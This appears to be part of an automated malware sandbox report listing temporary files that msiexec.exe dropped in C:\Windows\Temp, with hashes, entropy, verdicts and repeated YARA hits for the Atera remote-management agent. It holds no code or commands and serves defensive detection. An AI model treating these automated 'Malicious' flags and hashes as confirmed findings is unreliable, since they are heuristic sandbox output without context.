                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF9EA48A1BC6835568.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.13082196273741126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:CnAipVfedGSadGS7qIipVGedGSadGSfEqasJGaWTZkB+r+n:CnAStedGPdGeqISoedGPdGTbAU
                                                                                                                                                                                                                                        MD5:2B2463D221C7498C31A2E35009993FE6
                                                                                                                                                                                                                                        SHA1:07738B10D2E7BD75E678E483ED2EB606E0F380BE
                                                                                                                                                                                                                                        SHA-256:3C152CF86D7BF56B278FF93F26A2942CCD44FB6A575DADE371F7DAF906641BF0
                                                                                                                                                                                                                                        SHA-512:509D9D4637E0CFE33C680A00BAD9537AAEDD65350A367AF12853DB6E0E74F121DC7064CF9CDA79365C6A0F8A44AA6D4E9679D49F3DFDBAF4D73535E5FB9A325E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9EA48A1BC6835568.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA50F4A555F2C8793.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2783307556899586
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:mOLuXth8FXzdT5bGdfqqmaSjndddwEqdGUDjzbQiSsndddSE8Qq:hLXjTVKfqqmaf3DfNaQq
                                                                                                                                                                                                                                        MD5:3106D03461CA36C11DA718D44F730FFC
                                                                                                                                                                                                                                        SHA1:ED5C2B0911D44FEFC0ED9A7E88EE85BECAD7777A
                                                                                                                                                                                                                                        SHA-256:575C1BD27C34C7B4C7DF98D9CC7FBDDDEC3BEDDBCCA4E40DB155B420C7D14350
                                                                                                                                                                                                                                        SHA-512:FF6475B928EA4A1560CCFFBEAB0FD1BA26CE472E7549ACDC66A55A7F0F67B60FAE54AA67A120F42616CB9FFED4DBC6348C667EB194AD0CC7E19BDF2C4E562BF2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA50F4A555F2C8793.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA7D65D0D6A110EB1.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA86CC05CC3A94A66.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2804974923941066
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:sOFuFth8FXz/T5bugdfqqmTWSjndddwEqdcrGbQCSsndddwWeUJCQQq:7FBBTVtfqqmqfZcyN1ezQQq
                                                                                                                                                                                                                                        MD5:FB395C3347D7606970E528C3EEA0CC5A
                                                                                                                                                                                                                                        SHA1:0A21FC6DBEB1E603D89361D3DFE0A238929617E1
                                                                                                                                                                                                                                        SHA-256:52D9F28A27B9AC7AF225667C558F9F8EEFAC036FFF6F70503789E3192AF4B942
                                                                                                                                                                                                                                        SHA-512:2618CBACB46696146829065DF2844FAE40D919647220B64437568F2CC140E9BBF9D3A6DF11BA9F9A9807F8A5FFA1ABD4376011C13F13AF7347A2E1B24B5A4276
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA974D720F5B64201.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2220900366703216
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:S8PhcuRc06WXJEnT5HDSqISoedGPdGTbaStedGPdGTn:9hc1HnT5DnIDD
                                                                                                                                                                                                                                        MD5:DA248B97146E4F5338555E5775646CEF
                                                                                                                                                                                                                                        SHA1:F5E887A3D1F69E7306EC6A6CC10106B3904712CF
                                                                                                                                                                                                                                        SHA-256:6559352E6BE0D37D4B95CBB2B565FD8BED3F975EAE2775884D460A6815A83D28
                                                                                                                                                                                                                                        SHA-512:9F1FDFB298D4F6BBA3943113D9069155A40E7AEF3F52A21DED2075DF91CC8AE4A550D7E9A33AB5AF950A026DE4569BCB498F3F169562B83C6F82A5F4BB794966
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA974D720F5B64201.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA974D720F5B64201.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA974D720F5B64201.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB011B7D4783F73EF.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5707321163549923
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:58PhFuRc06WXz+FT5rdYm81RGSjnd/EqdGUDjzbQ6Ssnd/E8J:0hF1jFT3n818I3DfNP
                                                                                                                                                                                                                                        MD5:170E02EA2A6FBD2AF83F2EAE5C71AE7D
                                                                                                                                                                                                                                        SHA1:C3BEA972F21522D925488282042EC29ACEFAEDCA
                                                                                                                                                                                                                                        SHA-256:B2A35392E5DBD55006AF16BAD76EDDAEDEC4F83AF394C887E96D90FBB240EF3C
                                                                                                                                                                                                                                        SHA-512:07CEC48054691B7D9FE4328364938F8A487A14E820CCA0D0CFBC3273A0B3C5E7A57AC4C9F37FCCB38258906897DF45C4FB1AFD6975FDA36F0318B772A67C54FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB011B7D4783F73EF.TMP, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB011B7D4783F73EF.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB0856E4E424B8213.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB1AB467CACAB4BAA.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB3D323C48CA9AB48.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2643037726326458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:ktRuuUM+xFX4XT5R6SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:k3uL0T362SIBvHoYZ
                                                                                                                                                                                                                                        MD5:BA159CD2B807B7912EC67E00BE4964D1
                                                                                                                                                                                                                                        SHA1:5E1459BB5CB5B7187AFB8A60D68DB757444368AE
                                                                                                                                                                                                                                        SHA-256:49F20A3A94727E5335D803807C612068A9637EE725DBDB00CFE7AD9F09566166
                                                                                                                                                                                                                                        SHA-512:A2296F7FA5DD28BEEE1274C286E5F21931E9A724F8194022AA75ABAD9D49F962C620584B44BE79A17996C757125DDB19A6AF8094B7B9B12CF157AC7D551C3F82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB3D323C48CA9AB48.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB550E088638F90EA.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.07773748638646297
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOE+sc/P0QhPbgVky6lW:2F0i8n0itFzDHFN1P0onW
                                                                                                                                                                                                                                        MD5:8E2DBA915D62F314B0A9F31196AE704A
                                                                                                                                                                                                                                        SHA1:CAFB0FBD3F4499C9D3D71516FF751E0373B5F16E
                                                                                                                                                                                                                                        SHA-256:26163C245CE1141831EFD7209B484DB34F9801E8398FBE0578E6AEB5AE0A1142
                                                                                                                                                                                                                                        SHA-512:18DD016DF80BFBA10D41070ECC2E0839A7D3AF5A75544F7CC0E6F906F45AB0B226E00E5ADAC644BAC2223B7D579636F045B882B41986BF0FC07E874902379D35
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB877264F30F596DB.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB9516BEB2A4CA1D5.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001188130623557
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:GMMXukNveFXJbT5pBDeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:2XeDTnBD7IciuBulU4
                                                                                                                                                                                                                                        MD5:42E81CFC7B310BB55F06B690BE59224B
                                                                                                                                                                                                                                        SHA1:EE6BFEAD13AB267AF5B148D8A6FE9016E55F8C6B
                                                                                                                                                                                                                                        SHA-256:687DE0A4C6FC5714E780AAADFFAE77D0EA91007C27348191B6DE1B9897EC77DD
                                                                                                                                                                                                                                        SHA-512:F4A2FF0246C8CCCF0CDC5C2466C9923F04F0ACCC40585E1103454F4F73B736604719C1984EF443ED84671D78975BE34AA9886AC9F2C205139B8DC6F38DDCBDE4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB9516BEB2A4CA1D5.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB9E531F16AA045F7.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFBA22F97ED374F64F.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2804974923941066
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:sOFuFth8FXz/T5bugdfqqmTWSjndddwEqdcrGbQCSsndddwWeUJCQQq:7FBBTVtfqqmqfZcyN1ezQQq
                                                                                                                                                                                                                                        MD5:FB395C3347D7606970E528C3EEA0CC5A
                                                                                                                                                                                                                                        SHA1:0A21FC6DBEB1E603D89361D3DFE0A238929617E1
                                                                                                                                                                                                                                        SHA-256:52D9F28A27B9AC7AF225667C558F9F8EEFAC036FFF6F70503789E3192AF4B942
                                                                                                                                                                                                                                        SHA-512:2618CBACB46696146829065DF2844FAE40D919647220B64437568F2CC140E9BBF9D3A6DF11BA9F9A9807F8A5FFA1ABD4376011C13F13AF7347A2E1B24B5A4276
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFBA948CC462860B39.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2801471122011585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:rHhwu3th8FXzFT51d/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:rBw3rT5/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:F748ABB85E9F4504D2418E6191C492E0
                                                                                                                                                                                                                                        SHA1:4FB87176D22E34B6B7C3DCD87BB354401F4900C3
                                                                                                                                                                                                                                        SHA-256:4507DF3C9832380F26C91DCBD407F5B514C896A0ADD4E1D1D6E8DBCD4EF791FC
                                                                                                                                                                                                                                        SHA-512:0FE554965514706AFA6FED05164039B0BE3E3CD3B2DEBA0A0879BC98D4C18EA048E3EAE91B3BD246DA41F8CC773A6B5A6AB7E5AB9BE01270132585CD372AA98E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBA948CC462860B39.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFBF16540E82CECA20.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFC2AEA509A4AC059B.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFC48B3AB19609D547.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFCB414AE811CAE186.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2313338781687264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4VUuKNveFXJbT5bDSqISoedGPdGTbaStedGPdGTn:0U8DT9DnIDD
                                                                                                                                                                                                                                        MD5:12C2752CCC149703B4DA7D0CCC7F06E0
                                                                                                                                                                                                                                        SHA1:803E4E48D9562440C78E13E20EE40343BB38809B
                                                                                                                                                                                                                                        SHA-256:0D2338B4C0EF396FFB3EB78382D5160E62E96E248707C227367456FFAC74DA3B
                                                                                                                                                                                                                                        SHA-512:63F73A830565398BC05C59EB215C68D98B4E8B7569D6534FDED9657CA4F434D235C9AA58F065E7FA0355633E2241FBEF1E637CF48DBD6FDD73B24D2595CF6F7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFCB414AE811CAE186.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFD23CB521201ED0D5.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFD433CA0145E2A93A.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
